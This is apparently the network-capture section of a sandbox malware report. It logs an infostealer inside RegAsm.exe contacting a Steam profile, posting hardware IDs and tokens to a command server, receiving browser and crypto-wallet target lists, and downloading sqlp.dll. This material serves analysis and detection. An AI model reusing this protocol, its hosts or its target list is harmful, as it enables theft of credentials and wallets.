Sep 27, 2024 00:15:13.440391064 CEST	1236	IN	Data Raw: 8d 14 03 09 cb 81 fb 2c 0a 04 00 73 12 f7 db d9 ee dd 14 13 83 c3 08 78 f8 89 0a dd c0 d9 f7 5b c3 8b c0 8b c8 8b d1 83 ea 04 8b 12 83 e2 f0 03 d1 8b c2 8b d0 83 ea 04 8b 12 83 e2 f0 85 d2 75 02 33 c0 c3 8d 40 00 83 3d 3c 7a 44 00 00 74 1a 8b 15 Data Ascii: ,sx[u3@=<zDt8zD;r;8zDs=<zDt8zD3@SV ;BuZ;ZvB+^[BH^[WA_p0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49778	45.132.206.251	80	396	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 00:15:14.535037994 CEST	281	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----HJKECAAAFHJECAAAEBFC User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: cowod.hopto.org Content-Length: 5785 Connection: Keep-Alive Cache-Control: no-cache
Sep 27, 2024 00:15:14.535037994 CEST	5785	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 48 4a 4b 45 43 41 41 41 46 48 4a 45 43 41 41 41 45 42 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 66 64 64 34 66 Data Ascii: ------HJKECAAAFHJECAAAEBFCContent-Disposition: form-data; name="token"0fdd4ff8b8b9f6fde4d09adeb4e6b99c------HJKECAAAFHJECAAAEBFCContent-Disposition: form-data; name="build_id"e90840a846d017e7b095f7543cdf2d15------HJKECAAAFHJECA
Sep 27, 2024 00:15:16.084714890 CEST	188	IN	HTTP/1.1 200 OK Server: openresty Date: Thu, 26 Sep 2024 22:15:15 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive X-Served-By: cowod.hopto.org
Sep 27, 2024 00:15:16.085499048 CEST	188	IN	HTTP/1.1 200 OK Server: openresty Date: Thu, 26 Sep 2024 22:15:15 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive X-Served-By: cowod.hopto.org
Sep 27, 2024 00:15:16.085565090 CEST	188	IN	HTTP/1.1 200 OK Server: openresty Date: Thu, 26 Sep 2024 22:15:15 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive X-Served-By: cowod.hopto.org

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49783	104.26.13.205	80	3396	C:\ProgramData\AFHDGDGIID.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 00:15:30.650614977 CEST	63	OUT	GET / HTTP/1.1 Host: api.ipify.org Connection: Keep-Alive
Sep 27, 2024 00:15:31.230916023 CEST	227	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 22:15:31 GMT Content-Type: text/plain Content-Length: 11 Connection: keep-alive Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 8c969cf3dc361977-EWR Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33 Data Ascii: 8.46.123.33
Sep 27, 2024 00:15:34.891604900 CEST	39	OUT	GET / HTTP/1.1 Host: api.ipify.org
Sep 27, 2024 00:15:35.001194000 CEST	227	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 22:15:34 GMT Content-Type: text/plain Content-Length: 11 Connection: keep-alive Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 8c969d0b6e631977-EWR Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33 Data Ascii: 8.46.123.33

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49739	104.102.49.254	443	396	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 22:14:27 UTC	119	OUT	GET /profiles/76561199780418869 HTTP/1.1 Host: steamcommunity.com Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 22:14:27 UTC	1870	IN	HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=UTF-8 Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED] Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache Date: Thu, 26 Sep 2024 22:14:27 GMT Content-Length: 34725 Connection: close Set-Cookie: sessionid=01205d584caffe8e351fe9fc; Path=/; Secure; SameSite=None Set-Cookie: steamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=None
2024-09-26 22:14:27 UTC	14514	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
2024-09-26 22:14:27 UTC	16384	IN	Data Raw: 65 6e 44 6f 6e 65 27 3a 20 66 61 6c 73 65 2c 20 27 74 6f 6f 6c 74 69 70 43 6c 61 73 73 27 3a 20 27 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 65 6e 74 27 2c 20 27 6f 66 66 73 65 74 59 27 3a 2d 36 2c 20 27 6f 66 66 73 65 74 58 27 3a 20 31 2c 20 27 68 6f 72 69 7a 6f 6e 74 61 6c 53 6e 61 70 27 3a 20 34 2c 20 27 74 6f 6f 6c 74 69 70 50 61 72 65 6e 74 27 3a 20 27 23 67 6c 6f 62 61 6c 5f 68 65 61 64 65 72 20 2e 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 61 69 6e 65 72 27 2c 20 27 63 6f 72 72 65 63 74 46 6f 72 53 63 72 65 65 6e 53 69 7a 65 27 3a 20 66 61 6c 73 65 7d 29 3b 0d 0a 09 09 7d 29 3b 0d 0a 09 3c 2f 73 63 72 69 70 74 3e 0d 0a 0d 0a 09 09 3c 64 69 76 20 69 64 3d 22 67 6c 6f 62 61 6c 5f 61 63 74 69 6f 6e 73 22 3e 0d 0a 09 09 09 3c 64 69 76 20 72 6f 6c 65 3d 22 6e Data Ascii: enDone': false, 'tooltipClass': 'supernav_content', 'offsetY':-6, 'offsetX': 1, 'horizontalSnap': 4, 'tooltipParent': '#global_header .supernav_container', 'correctForScreenSize': false});});</script><div id="global_actions"><div role="n
2024-09-26 22:14:27 UTC	3768	IN	Data Raw: 76 61 74 65 26 71 75 6f 74 3b 3a 74 72 75 65 7d 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 3e 56 69 65 77 20 6d 6f 72 65 20 69 6e 66 6f 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 20 24 4a 28 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 20 49 6e 69 74 50 72 6f 66 69 6c 65 53 75 6d 6d 61 72 79 28 20 67 5f 72 67 50 72 6f 66 69 6c 65 44 61 74 61 5b 27 73 75 6d 6d 61 72 79 27 5d 20 29 3b 20 7d 20 29 3b 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f Data Ascii: vate":true}" class="whiteLink" class="whiteLink">View more info</span></div><script type="text/javascript"> $J( function() { InitProfileSummary( g_rgProfileData['summary'] ); } ); </script></div></div></div></
2024-09-26 22:14:27 UTC	59	IN	Data Raw: 0d 0a 0d 0a 3c 2f 64 69 76 3e 09 3c 21 2d 2d 20 72 65 73 70 6f 6e 73 69 76 65 5f 70 61 67 65 5f 66 72 61 6d 65 20 2d 2d 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e Data Ascii: </div>... responsive_page_frame --></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49740	5.75.211.162	443	396	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 22:14:28 UTC	185	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 22:14:29 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 22:14:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 22:14:29 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49741	5.75.211.162	443	396	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 22:14:30 UTC	277	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----KKFCFBKFCFBFIDGCGDHJ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 256 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 22:14:30 UTC	256	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4b 4b 46 43 46 42 4b 46 43 46 42 46 49 44 47 43 47 44 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 38 42 32 39 41 38 33 39 37 35 30 33 30 31 32 33 34 33 35 37 36 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 46 43 46 42 4b 46 43 46 42 46 49 44 47 43 47 44 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 39 30 38 34 30 61 38 34 36 64 30 31 37 65 37 62 30 39 35 66 37 35 34 33 63 64 66 32 64 31 35 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 46 43 46 42 4b 46 43 46 42 46 49 44 47 43 47 44 48 4a 2d 2d 0d Data Ascii: ------KKFCFBKFCFBFIDGCGDHJContent-Disposition: form-data; name="hwid"28B29A8397503012343576-a33c7340-61ca------KKFCFBKFCFBFIDGCGDHJContent-Disposition: form-data; name="build_id"e90840a846d017e7b095f7543cdf2d15------KKFCFBKFCFBFIDGCGDHJ--
2024-09-26 22:14:30 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 22:14:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 22:14:30 UTC	69	IN	Data Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 31 7c 30 66 64 64 34 66 66 38 62 38 62 39 66 36 66 64 65 34 64 30 39 61 64 65 62 34 65 36 62 39 39 63 7c 31 7c 31 7c 31 7c 30 7c 30 7c 35 30 30 30 30 7c 31 0d 0a 30 0d 0a 0d 0a Data Ascii: 3a1\|1\|1\|1\|0fdd4ff8b8b9f6fde4d09adeb4e6b99c\|1\|1\|1\|0\|0\|50000\|10

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49742	5.75.211.162	443	396	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 22:14:31 UTC	277	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----HJJEHJJKJEGHJJKEBFBG User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 22:14:31 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 48 4a 4a 45 48 4a 4a 4b 4a 45 47 48 4a 4a 4b 45 42 46 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 66 64 64 34 66 66 38 62 38 62 39 66 36 66 64 65 34 64 30 39 61 64 65 62 34 65 36 62 39 39 63 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4a 45 48 4a 4a 4b 4a 45 47 48 4a 4a 4b 45 42 46 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 39 30 38 34 30 61 38 34 36 64 30 31 37 65 37 62 30 39 35 66 37 35 34 33 63 64 66 32 64 31 35 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4a 45 48 4a 4a 4b 4a 45 47 48 4a 4a 4b 45 42 46 42 47 0d 0a 43 6f 6e 74 Data Ascii: ------HJJEHJJKJEGHJJKEBFBGContent-Disposition: form-data; name="token"0fdd4ff8b8b9f6fde4d09adeb4e6b99c------HJJEHJJKJEGHJJKEBFBGContent-Disposition: form-data; name="build_id"e90840a846d017e7b095f7543cdf2d15------HJJEHJJKJEGHJJKEBFBGCont
2024-09-26 22:14:32 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 22:14:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 22:14:32 UTC	1564	IN	Data Raw: 36 31 30 0d 0a 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 64 76 62 32 64 73 5a 53 42 44 61 48 4a 76 62 57 55 67 51 32 46 75 59 58 4a 35 66 46 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46 4e 34 55 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4e 6f 63 6d 39 74 61 58 56 74 66 46 78 44 61 48 4a 76 62 57 6c 31 62 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 46 52 76 63 6d 4e 6f 66 46 78 55 62 33 4a 6a 61 46 78 56 63 32 56 79 49 45 Data Ascii: 610R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEdvb2dsZSBDaHJvbWUgQ2FuYXJ5fFxHb29nbGVcQ2hyb21lIFN4U1xVc2VyIERhdGF8Y2hyb21lfENocm9taXVtfFxDaHJvbWl1bVxVc2VyIERhdGF8Y2hyb21lfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfFRvcmNofFxUb3JjaFxVc2VyIE

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49743	5.75.211.162	443	396	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 22:14:32 UTC	277	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----DGHJEHJJDAAAKEBGCFCA User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 22:14:32 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 44 47 48 4a 45 48 4a 4a 44 41 41 41 4b 45 42 47 43 46 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 66 64 64 34 66 66 38 62 38 62 39 66 36 66 64 65 34 64 30 39 61 64 65 62 34 65 36 62 39 39 63 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 4a 45 48 4a 4a 44 41 41 41 4b 45 42 47 43 46 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 39 30 38 34 30 61 38 34 36 64 30 31 37 65 37 62 30 39 35 66 37 35 34 33 63 64 66 32 64 31 35 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 4a 45 48 4a 4a 44 41 41 41 4b 45 42 47 43 46 43 41 0d 0a 43 6f 6e 74 Data Ascii: ------DGHJEHJJDAAAKEBGCFCAContent-Disposition: form-data; name="token"0fdd4ff8b8b9f6fde4d09adeb4e6b99c------DGHJEHJJDAAAKEBGCFCAContent-Disposition: form-data; name="build_id"e90840a846d017e7b095f7543cdf2d15------DGHJEHJJDAAAKEBGCFCACont
2024-09-26 22:14:33 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 22:14:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 22:14:33 UTC	5685	IN	Data Raw: 31 36 32 38 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62 Data Ascii: 1628TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49744	5.75.211.162	443	396	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 22:14:34 UTC	277	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----ECFCBKJDBFIJKFHIIDAA User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 332 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 22:14:34 UTC	332	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 45 43 46 43 42 4b 4a 44 42 46 49 4a 4b 46 48 49 49 44 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 66 64 64 34 66 66 38 62 38 62 39 66 36 66 64 65 34 64 30 39 61 64 65 62 34 65 36 62 39 39 63 0d 0a 2d 2d 2d 2d 2d 2d 45 43 46 43 42 4b 4a 44 42 46 49 4a 4b 46 48 49 49 44 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 39 30 38 34 30 61 38 34 36 64 30 31 37 65 37 62 30 39 35 66 37 35 34 33 63 64 66 32 64 31 35 0d 0a 2d 2d 2d 2d 2d 2d 45 43 46 43 42 4b 4a 44 42 46 49 4a 4b 46 48 49 49 44 41 41 0d 0a 43 6f 6e 74 Data Ascii: ------ECFCBKJDBFIJKFHIIDAAContent-Disposition: form-data; name="token"0fdd4ff8b8b9f6fde4d09adeb4e6b99c------ECFCBKJDBFIJKFHIIDAAContent-Disposition: form-data; name="build_id"e90840a846d017e7b095f7543cdf2d15------ECFCBKJDBFIJKFHIIDAACont
2024-09-26 22:14:34 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 22:14:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 22:14:34 UTC	119	IN	Data Raw: 36 63 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 46 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 0d 0a 30 0d 0a 0d 0a Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49745	5.75.211.162	443	396	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 22:14:35 UTC	278	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----EHIJJDGDHDGDAKFIECFI User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 7181 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 22:14:35 UTC	7181	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 45 48 49 4a 4a 44 47 44 48 44 47 44 41 4b 46 49 45 43 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 66 64 64 34 66 66 38 62 38 62 39 66 36 66 64 65 34 64 30 39 61 64 65 62 34 65 36 62 39 39 63 0d 0a 2d 2d 2d 2d 2d 2d 45 48 49 4a 4a 44 47 44 48 44 47 44 41 4b 46 49 45 43 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 39 30 38 34 30 61 38 34 36 64 30 31 37 65 37 62 30 39 35 66 37 35 34 33 63 64 66 32 64 31 35 0d 0a 2d 2d 2d 2d 2d 2d 45 48 49 4a 4a 44 47 44 48 44 47 44 41 4b 46 49 45 43 46 49 0d 0a 43 6f 6e 74 Data Ascii: ------EHIJJDGDHDGDAKFIECFIContent-Disposition: form-data; name="token"0fdd4ff8b8b9f6fde4d09adeb4e6b99c------EHIJJDGDHDGDAKFIECFIContent-Disposition: form-data; name="build_id"e90840a846d017e7b095f7543cdf2d15------EHIJJDGDHDGDAKFIECFICont
2024-09-26 22:14:36 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 22:14:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 22:14:36 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49746	5.75.211.162	443	396	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 22:14:36 UTC	193	OUT	GET /sqlp.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 22:14:37 UTC	263	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 22:14:36 GMT Content-Type: application/octet-stream Content-Length: 2459136 Connection: close Last-Modified: Thursday, 26-Sep-2024 22:14:36 GMT Cache-Control: no-store, no-cache Accept-Ranges: bytes
2024-09-26 22:14:37 UTC	16121	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1e d2 37 9f 5a b3 59 cc 5a b3 59 cc 5a b3 59 cc 11 cb 5a cd 6e b3 59 cc 11 cb 5c cd cf b3 59 cc 11 cb 5d cd 7f b3 59 cc 11 cb 58 cd 59 b3 59 cc 5a b3 58 cc d8 b3 59 cc 4f cc 5c cd 45 b3 59 cc 4f cc 5d cd 55 b3 59 cc 4f cc 5a cd 4c b3 59 cc 6c 33 5d cd 5b b3 59 cc 6c 33 59 cd 5b b3 59 cc 6c 33 a6 cc 5b b3 59 cc 6c 33 5b cd 